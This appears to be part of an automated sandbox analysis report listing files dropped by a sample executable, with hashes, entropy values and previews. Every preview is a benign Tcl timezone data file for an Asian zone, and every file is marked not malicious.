                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8402
                                                                                                                                                                                                                              Entropy (8bit):3.7520828858184325
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:fXSd2XK1GbJFp3gP0nPVl8dcqUZ8O8pc1FoMpQ2NpPfM2g1siiVVfIsuDzhsXa4a:fiIgGbJv3dPADPc1FoMpHu3Ky3p
                                                                                                                                                                                                                              MD5:6F176787C7FC5764A63719F0041690BA
                                                                                                                                                                                                                              SHA1:C292A8CEA597D7FD9E2D071AB7AE93E7ABCA21A5
                                                                                                                                                                                                                              SHA-256:732CAA355542C8781C61FC8F5265EBFC59C8CC24E78D01011E1E3256E6B34DC7
                                                                                                                                                                                                                              SHA-512:EE8F39A3D65D75E14B59B4D9CCB27894210CA269E82A7AC7F98BE67764688A8895EBB9C1ACEAB4C1B368B4F1BC5AFCB34E8866CEDFD91232926DF47517096513
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Hebron) {.. {-9223372036854775808 8423 0 LMT}.. {-2185410023 7200 0 EEST}.. {-933638400 10800 1 EEST}.. {-923097600 7200 0 EEST}.. {-919036800 10800 1 EEST}.. {-857347200 7200 0 EEST}.. {-844300800 10800 1 EEST}.. {-825811200 7200 0 EEST}.. {-812678400 10800 1 EEST}.. {-794188800 7200 0 EEST}.. {-779846400 10800 1 EEST}.. {-762652800 7200 0 EEST}.. {-748310400 10800 1 EEST}.. {-731116800 7200 0 EEST}.. {-682653600 7200 0 EET}.. {-399088800 10800 1 EEST}.. {-386650800 7200 0 EET}.. {-368330400 10800 1 EEST}.. {-355114800 7200 0 EET}.. {-336790800 10800 1 EEST}.. {-323654400 7200 0 EET}.. {-305168400 10800 1 EEST}.. {-292032000 7200 0 EET}.. {-273632400 10800 1 EEST}.. {-260496000 7200 0 EET}.. {-242096400 10800 1 EEST}.. {-228960000 7200 0 EET}.. {-210560400 10800 1 EEST}.. {-197424000 7200 0 EET}.. {-178938000 10800 1 EEST}.. {-165
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):395
                                                                                                                                                                                                                              Entropy (8bit):4.431055857167822
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862RLmdHneCvhYC5sF/p+zHHviViksF/dMUYPsF/RQ9EsV:5de3vhd5sFR+znv2vsFlM/PsFVsV
                                                                                                                                                                                                                              MD5:A49A3D55C1E10A37125C51F9C6363868
                                                                                                                                                                                                                              SHA1:7C1B5D44643ADC3F02681F6379E82C3F4512F0C1
                                                                                                                                                                                                                              SHA-256:D8A19C70BE5A9AE1E6091DC8FD03D7719110D1F3D78786C91D5BD0949FB5A428
                                                                                                                                                                                                                              SHA-512:804C44E51BB9E93B156B0CB4CB125651003B3C42D65334A052BE149734221315CC75D4FBDE34F62DFC102F1A9C968D1C9B573839C7ECBF7397B61BD90E530B20
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ho_Chi_Minh) {.. {-9223372036854775808 25590 0 LMT}.. {-2004073590 25590 0 PLMT}.. {-1851577590 25200 0 +07}.. {-852105600 28800 0 +08}.. {-782643600 32400 0 +09}.. {-767869200 25200 0 +07}.. {-718095600 28800 0 +08}.. {-457776000 25200 0 +07}.. {-315648000 28800 0 +08}.. {171820800 25200 0 +07}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2226
                                                                                                                                                                                                                              Entropy (8bit):4.0055033036300145
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5Ze9l9Pm4yoHtTYJJIX1Zcp6GS0j1SPQpP6gPE8fTZIPNYQGm75st/nQdwi9:DyaoTcwQt6EsQTng
                                                                                                                                                                                                                              MD5:26BCBBA28AE34FE3CF7D17EF4C6B69C8
                                                                                                                                                                                                                              SHA1:5324DEA8E7965C66650E7B4769EFA1297B508486
                                                                                                                                                                                                                              SHA-256:EE9A6997BC1AAD4A8FA95DB312774C3F37FBB895549230C30FC66C02CC170EB6
                                                                                                                                                                                                                              SHA-512:54594CD18838B4A8947EBB5BDE2415727CC127CF79AEC98FC0F5D5A32F68EEAF4E079853239DE9F753CE90F18EFD55AE51FC43D64E313666CEA0EF8AC93BF065
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Hong_Kong) {.. {-9223372036854775808 27402 0 LMT}.. {-2056690800 28800 0 HKT}.. {-900910800 32400 1 HKST}.. {-891579600 30600 1 HKWT}.. {-884248200 32400 0 JST}.. {-761209200 28800 0 HKT}.. {-747907200 32400 1 HKST}.. {-728541000 28800 0 HKT}.. {-717049800 32400 1 HKST}.. {-697091400 28800 0 HKT}.. {-683785800 32400 1 HKST}.. {-668061000 28800 0 HKT}.. {-654755400 32400 1 HKST}.. {-636611400 28800 0 HKT}.. {-623305800 32400 1 HKST}.. {-605161800 28800 0 HKT}.. {-591856200 32400 1 HKST}.. {-573712200 28800 0 HKT}.. {-559801800 32400 1 HKST}.. {-541657800 28800 0 HKT}.. {-528352200 32400 1 HKST}.. {-510211800 28800 0 HKT}.. {-498112200 32400 1 HKST}.. {-478762200 28800 0 HKT}.. {-466662600 32400 1 HKST}.. {-446707800 28800 0 HKT}.. {-435213000 32400 1 HKST}.. {-415258200 28800 0 HKT}.. {-403158600 32400 1 HKST}.. {-383808600 28800 0 HKT
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1583
                                                                                                                                                                                                                              Entropy (8bit):3.7521760184466206
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5x3LecCvgsFFFKOksF8FpsF71FQnsFNFxhsFlF6sFaFasFZFisF8GF5sFKLFAZsZ:5FqKVx8Cq9f/y2L
                                                                                                                                                                                                                              MD5:A77140A0D8C2D3E2993E4BA7CADFB4C6
                                                                                                                                                                                                                              SHA1:AE3586264A86D42F578D4B0F7A30C9BE6047EAB1
                                                                                                                                                                                                                              SHA-256:CA88A45E954A9854C680B399E69E4858BF5E861FABFADC19D62D97B734B25415
                                                                                                                                                                                                                              SHA-512:05EA9D903EEC755F799B7C2399ED933245A5AE3A594648FE37AF1CE7699AE499B4ED159F428D91259D80BC9AF5117F2DA055A506AED94E5281C38B7AFF69C6FE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Hovd) {.. {-9223372036854775808 21996 0 LMT}.. {-2032927596 21600 0 +06}.. {252439200 25200 0 +07}.. {417978000 28800 1 +07}.. {433785600 25200 0 +07}.. {449600400 28800 1 +07}.. {465321600 25200 0 +07}.. {481050000 28800 1 +07}.. {496771200 25200 0 +07}.. {512499600 28800 1 +07}.. {528220800 25200 0 +07}.. {543949200 28800 1 +07}.. {559670400 25200 0 +07}.. {575398800 28800 1 +07}.. {591120000 25200 0 +07}.. {606848400 28800 1 +07}.. {622569600 25200 0 +07}.. {638298000 28800 1 +07}.. {654624000 25200 0 +07}.. {670352400 28800 1 +07}.. {686073600 25200 0 +07}.. {701802000 28800 1 +07}.. {717523200 25200 0 +07}.. {733251600 28800 1 +07}.. {748972800 25200 0 +07}.. {764701200 28800 1 +07}.. {780422400 25200 0 +07}.. {796150800 28800 1 +07}.. {811872000 25200 0 +07}.. {828205200 28800 1 +07}.. {843926400 25200 0 +07}.. {859654800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2089
                                                                                                                                                                                                                              Entropy (8bit):3.7296034934492694
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5PZy4DdOKStci4KjXoYjoSvfQJWE00dtT43kgiTskNrrBizhzRBqY3M:Py2/svfraBGfgP
                                                                                                                                                                                                                              MD5:C9F7AC464970567E5C38CB01ED2297AE
                                                                                                                                                                                                                              SHA1:453718BACCAE3FACD761AF22CA5875185478ADDD
                                                                                                                                                                                                                              SHA-256:61BAAAD6315FFBDAED6F266880165B06ECCAF72F660B7FB01C8B654F3952D68E
                                                                                                                                                                                                                              SHA-512:72044EFAE262CC12974F2DE2AAF06AC4C31BE73071ACD53DDC6B8D8BFC6FBDF937EC03DC881901F730659BDE662FBCFC76C57B2C086DAA97F160530464FBA7C6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Irkutsk) {.. {-9223372036854775808 25025 0 LMT}.. {-2840165825 25025 0 IMT}.. {-1575874625 25200 0 +07}.. {-1247554800 28800 0 +09}.. {354902400 32400 1 +09}.. {370710000 28800 0 +08}.. {386438400 32400 1 +09}.. {402246000 28800 0 +08}.. {417974400 32400 1 +09}.. {433782000 28800 0 +08}.. {449596800 32400 1 +09}.. {465328800 28800 0 +08}.. {481053600 32400 1 +09}.. {496778400 28800 0 +08}.. {512503200 32400 1 +09}.. {528228000 28800 0 +08}.. {543952800 32400 1 +09}.. {559677600 28800 0 +08}.. {575402400 32400 1 +09}.. {591127200 28800 0 +08}.. {606852000 32400 1 +09}.. {622576800 28800 0 +08}.. {638301600 32400 1 +09}.. {654631200 28800 0 +08}.. {670356000 25200 0 +08}.. {670359600 28800 1 +08}.. {686084400 25200 0 +07}.. {695761200 28800 0 +09}.. {701805600 32400 1 +09}.. {717530400 28800 0 +08}.. {733255200 32400 1 +09}.. {748
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.9013773460609
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV0XaDovXHAIgoq3XRFvHRL/2WFK4HB/8QaqXKv:SlSWB9vsM3ymQa2HAIgoQ/HN/2wK4HJa
                                                                                                                                                                                                                              MD5:8A92C690BE27A69D122BFF51479B7B56
                                                                                                                                                                                                                              SHA1:52DB64587A347F34153A51788BDE8C349D966575
                                                                                                                                                                                                                              SHA-256:1F77C4BD27574E1D2066885DEF01806A02D3E444424A219A8EC5C114F89665E5
                                                                                                                                                                                                                              SHA-512:FEDF57C4862B6792A789F339EB1027EC8A8472B01B7D1D0814C419850B9AC03A7B454FDB04D8BECE166E9A8BCAA58B0B461007A6C824B30B1080991A1DB49CCA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Istanbul)]} {.. LoadTimeZoneFile Europe/Istanbul..}..set TZData(:Asia/Istanbul) $TZData(:Europe/Istanbul)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):370
                                                                                                                                                                                                                              Entropy (8bit):4.4733192761103515
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKcrJfDm2OHATJeoHMaSYov/YSZkc5q/MVSSFFWSyvScH+dMVSSFL+:MB862EJLmdHjCEdOc5aMxaSyHHaMxF6P
                                                                                                                                                                                                                              MD5:C689A1AA9FFE535AEB3AD3D7EDE55172
                                                                                                                                                                                                                              SHA1:0520FC9A4619FB555A79C5DF2AE82422BF2C5EDA
                                                                                                                                                                                                                              SHA-256:2F39D9F93761B85C254F458317A7DE2B4184BE9459F2193A85C08662E801269A
                                                                                                                                                                                                                              SHA-512:C1034FB2FCFEF201C5362AF21B048B6637A824C5C93D75854CF3807892C772CD4376533E58BFF8D8726F531F43CB231365B8012EBD3C1BECED865D3CD2D6673D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Jakarta) {.. {-9223372036854775808 25632 0 LMT}.. {-3231299232 25632 0 BMT}.. {-1451719200 26400 0 +0720}.. {-1172906400 27000 0 +0730}.. {-876641400 32400 0 +09}.. {-766054800 27000 0 +0730}.. {-683883000 28800 0 +08}.. {-620812800 27000 0 +0730}.. {-189415800 25200 0 WIB}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):213
                                                                                                                                                                                                                              Entropy (8bit):4.834345288972067
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKcaDm2OHG4YoH1kcfvScHVowkVcr2CV4zvhyov:MB862PmdHNYC6cfHHVop2NVkoov
                                                                                                                                                                                                                              MD5:2CB3A13FCC48F8C4457E001FC309918B
                                                                                                                                                                                                                              SHA1:83174176815CB93D216B5BC532C120EC8AC433CF
                                                                                                                                                                                                                              SHA-256:761C1E80FEBF46D6D6215CEBF211F121974156D9BCE2FB4258C1074C6ED2CE22
                                                                                                                                                                                                                              SHA-512:65009020AB9FEC2F8158A4851A78B71127F9B262DDD1472583942E19B7C086304F54BC8DAE5A40BD1448BCAEDA0FDBACCD19400E10FFA0357E324535F9036EF0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Jayapura) {.. {-9223372036854775808 33768 0 LMT}.. {-1172913768 32400 0 +09}.. {-799491600 34200 0 +0930}.. {-189423000 32400 0 WIT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8135
                                                                                                                                                                                                                              Entropy (8bit):3.770028446231146
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:GKfnxFAEX/nPVl8diAg9oEhH20AHz7LzdWhYbBJPXuVhKaM76Rmg4DLeEcNptv5C:7ffBvPAzF0AHzPzdD1+XBRF0
                                                                                                                                                                                                                              MD5:884227D48C92BA6C519BFE571D4F1037
                                                                                                                                                                                                                              SHA1:21F8977816C2B439686A50D353B836A6D132A946
                                                                                                                                                                                                                              SHA-256:0BDC2C693134199C2ECD374CC01468813DB29DF47422C706A3EA2BE5ECCA177A
                                                                                                                                                                                                                              SHA-512:8A09F1FE11DAD203501A16FE6A2CAEC969FE3553B456B8BD1997E55B3EE430B2BB4B54F7D87C5E99931FD96E7C769CAA618C777EBD23FBD1E1A0F57409422914
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Jerusalem) {.. {-9223372036854775808 8454 0 LMT}.. {-2840149254 8440 0 JMT}.. {-1641003640 7200 0 IST}.. {-933638400 10800 1 IDT}.. {-923097600 7200 0 IST}.. {-919036800 10800 1 IDT}.. {-857347200 7200 0 IST}.. {-844300800 10800 1 IDT}.. {-825811200 7200 0 IST}.. {-812678400 10800 1 IDT}.. {-794188800 7200 0 IST}.. {-779846400 10800 1 IDT}.. {-762652800 7200 0 IST}.. {-748310400 10800 1 IDT}.. {-731116800 7200 0 IST}.. {-681955200 14400 1 IDDT}.. {-673228800 10800 1 IDT}.. {-667958400 7200 0 IST}.. {-652320000 10800 1 IDT}.. {-636422400 7200 0 IST}.. {-622080000 10800 1 IDT}.. {-608947200 7200 0 IST}.. {-591840000 10800 1 IDT}.. {-572486400 7200 0 IST}.. {-558576000 10800 1 IDT}.. {-542851200 7200 0 IST}.. {-527731200 10800 1 IDT}.. {-514425600 7200 0 IST}.. {-490838400 10800 1 IDT}.. {-482976000 7200 0 IST}.. {-459388800 10800 1 I
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.8546989169864085
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKTtNMXGm2OHodFxsYoHvgVHURRNVsRYovFFFkdj/cXHF:SlSWB9eg/2wKTPDm2OHoH+YoHvgVHURA
                                                                                                                                                                                                                              MD5:9BD9B21661C235C0794078EC98978D3B
                                                                                                                                                                                                                              SHA1:3D854780F49D0E5F5A190DC9367C7406127C5E4D
                                                                                                                                                                                                                              SHA-256:A59C95C038F2E945D685D96FA9B859CE82A643A1B7F56EB36B2C809DE91CD4BA
                                                                                                                                                                                                                              SHA-512:A76E99CF03DA8897F0A210A98DB79E4CD60070F2BE363D0D0960D9882919F9B49978FA55BB2500F1648ADD4080730CAD85BAFF61D885A9EAD394AC04C850F6BA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kabul) {.. {-9223372036854775808 16608 0 LMT}.. {-2524538208 14400 0 +04}.. {-788932800 16200 0 +0430}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2060
                                                                                                                                                                                                                              Entropy (8bit):3.788131608921229
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5+SeWI/2kkWk7YFpR2kHmxCcUdBbcHDLV2vpXt25A0UeRr9ydzkMfF6USRWk9UuV:5i/2ZsFLrcZwvJt2F+doTr9Q3G80
                                                                                                                                                                                                                              MD5:390F39934F095F89358B73D056D90264
                                                                                                                                                                                                                              SHA1:6B57CE5346B50ED88BFBB6BC57F834FB3F564905
                                                                                                                                                                                                                              SHA-256:6E0278E389072437BC07A5032CD58E9E5B1B2BDB20918632C422EFA97BC43ABF
                                                                                                                                                                                                                              SHA-512:6C54D94E95D73030F2FFCF8D130494CBD79FB1CEB9B59ADE0743C10F02557C3DD59CC6274B262A7E29C2D4C35DDA4B6A9A0398C661F5BD40F3B92181192B9577
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kamchatka) {.. {-9223372036854775808 38076 0 LMT}.. {-1487759676 39600 0 +11}.. {-1247569200 43200 0 +13}.. {354888000 46800 1 +13}.. {370695600 43200 0 +12}.. {386424000 46800 1 +13}.. {402231600 43200 0 +12}.. {417960000 46800 1 +13}.. {433767600 43200 0 +12}.. {449582400 46800 1 +13}.. {465314400 43200 0 +12}.. {481039200 46800 1 +13}.. {496764000 43200 0 +12}.. {512488800 46800 1 +13}.. {528213600 43200 0 +12}.. {543938400 46800 1 +13}.. {559663200 43200 0 +12}.. {575388000 46800 1 +13}.. {591112800 43200 0 +12}.. {606837600 46800 1 +13}.. {622562400 43200 0 +12}.. {638287200 46800 1 +13}.. {654616800 43200 0 +12}.. {670341600 39600 0 +12}.. {670345200 43200 1 +12}.. {686070000 39600 0 +11}.. {695746800 43200 0 +13}.. {701791200 46800 1 +13}.. {717516000 43200 0 +12}.. {733240800 46800 1 +13}.. {748965600 43200 0 +12}.. {764
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):457
                                                                                                                                                                                                                              Entropy (8bit):4.396286144160272
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862dmdH35Cy6DvjeQXvjKEn6vNEhFc0bkTfb2iWToN1:5de3IjjeQ/jKE6vNNa8
                                                                                                                                                                                                                              MD5:DF604BCD42A3C1E6BABD0E4FF5764CA3
                                                                                                                                                                                                                              SHA1:984111F3A75EE7D8760AA2B839010545AF8EE359
                                                                                                                                                                                                                              SHA-256:4E7F7ACAE8B4018A835328744F680C8054771805BB0BB07678A09737963C090D
                                                                                                                                                                                                                              SHA-512:690AC3FC7CA3C66AA70F17E38C6B43FFACAB3F86040C3BA94FBFF80AC8C1AECF8192E503282109DABF3228F8DC73C732F1041C80455B8B26BDB25C4C32FA286A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Karachi) {.. {-9223372036854775808 16092 0 LMT}.. {-1988166492 19800 0 +0530}.. {-862637400 23400 1 +0630}.. {-764145000 19800 0 +0530}.. {-576135000 18000 0 +05}.. {38775600 18000 0 PKT}.. {1018119600 21600 1 PKST}.. {1033840800 18000 0 PKT}.. {1212260400 21600 1 PKST}.. {1225476000 18000 0 PKT}.. {1239735600 21600 1 PKST}.. {1257012000 18000 0 PKT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):174
                                                                                                                                                                                                                              Entropy (8bit):4.967143524972358
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8s4YkyXHAIgNrYOARL/2WFKu3e2WFKjov:SlSWB9vsM3yMGSHAIgvAN/2wKulwKjy
                                                                                                                                                                                                                              MD5:259662F35AA09A891C2DDF8FCFECD6F0
                                                                                                                                                                                                                              SHA1:DBB3A363A34C33F0B6B0D677E43C2985E2BAF976
                                                                                                                                                                                                                              SHA-256:7B2251F0A41CBADF45D69F24604834167B14D8D33B510E635719AB404CABBCE2
                                                                                                                                                                                                                              SHA-512:CD7E514555D58985C774535556B66542EFC5FB7CD5891F42FE21B591612CB7EBD4B41E96593E26E9283BA1B01EF3BE0FDFAE871F5EF6ADF2286AF1E479DCB44B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Urumqi)]} {.. LoadTimeZoneFile Asia/Urumqi..}..set TZData(:Asia/Kashgar) $TZData(:Asia/Urumqi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.896398105471451
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKXIi7hvXMXGm2OHF+VT5oHsQKwMTXvv6Q6zRk8P4VvW/:SlSWB9eg/2wKYghfDm2OH0T5oHxNMzv8
                                                                                                                                                                                                                              MD5:7AC6429D2A08372C71C61B4521246FEC
                                                                                                                                                                                                                              SHA1:6E50F5AD1018398491453D751F8B717B618EF46E
                                                                                                                                                                                                                              SHA-256:F0A0816E62036637F75081CBF17A1E6B8FBC2D86AEC3CD2E234BBBDD6EC9F109
                                                                                                                                                                                                                              SHA-512:A5389A318896ABCAFE419262F6B8CA86C917788F1E2AFBC8CB1C074A52870E7A92C9F6F7D79DDE4AB0D267D870D3CCD69B3FC5FD57520352EFE36C583B493FB9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kathmandu) {.. {-9223372036854775808 20476 0 LMT}.. {-1577943676 19800 0 +0530}.. {504901800 20700 0 +0545}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.8363583658476745
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8yIi7V5XHAIgN1AIilvWARL/2WFKSiZ1/2WFKXIi7y:SlSWB9vsM3y7gVJHAIg5QOAN/2wKSg15
                                                                                                                                                                                                                              MD5:4CCC96293A33113D9ADC4130DCD19CBA
                                                                                                                                                                                                                              SHA1:7BAB4B8DD6BB415A2FC86D9AB36BE2A893C03153
                                                                                                                                                                                                                              SHA-256:9ACC9586B6F8B53BFE8B242283A434A9A9633D60559EBFDEE263B4C8915D50CA
                                                                                                                                                                                                                              SHA-512:644E1777E01C15A728E30526F131462FCE50476A8FEDA9B99F41D95013BB8833A79437E75AA2025E2FD2E253B9AD40709DEF77E1F0C73DAAE7A9CF886A175A03
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Kathmandu)]} {.. LoadTimeZoneFile Asia/Kathmandu..}..set TZData(:Asia/Katmandu) $TZData(:Asia/Kathmandu)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2119
                                                                                                                                                                                                                              Entropy (8bit):3.707911838150672
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5No6r1gIgWH/lt0irzEzCSCItWiIrW+rDQk9CVhyFYkRDhUBAc6l:r5PhtjLiII2JBC6c6l
                                                                                                                                                                                                                              MD5:D7B394A9662D60D01781005FE73CC9E8
                                                                                                                                                                                                                              SHA1:50B5EBD02596DC45D1F69358C5B69DD3058905FC
                                                                                                                                                                                                                              SHA-256:33203D7FB7F3D1F848640ECE0642A2305E1863B4D47413075E2E7E40BD7418E7
                                                                                                                                                                                                                              SHA-512:055EBA420F2F6049E803796ACCA263264B9E585E5312A86B8DF7B409C5F1CB1810F3AEDACD66CCF4605E55198947D263C240486C2A4D453D23C89802F0C66BBA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Khandyga) {.. {-9223372036854775808 32533 0 LMT}.. {-1579424533 28800 0 +08}.. {-1247558400 32400 0 +10}.. {354898800 36000 1 +10}.. {370706400 32400 0 +09}.. {386434800 36000 1 +10}.. {402242400 32400 0 +09}.. {417970800 36000 1 +10}.. {433778400 32400 0 +09}.. {449593200 36000 1 +10}.. {465325200 32400 0 +09}.. {481050000 36000 1 +10}.. {496774800 32400 0 +09}.. {512499600 36000 1 +10}.. {528224400 32400 0 +09}.. {543949200 36000 1 +10}.. {559674000 32400 0 +09}.. {575398800 36000 1 +10}.. {591123600 32400 0 +09}.. {606848400 36000 1 +10}.. {622573200 32400 0 +09}.. {638298000 36000 1 +10}.. {654627600 32400 0 +09}.. {670352400 28800 0 +09}.. {670356000 32400 1 +09}.. {686080800 28800 0 +08}.. {695757600 32400 0 +10}.. {701802000 36000 1 +10}.. {717526800 32400 0 +09}.. {733251600 36000 1 +10}.. {748976400 32400 0 +09}.. {7647
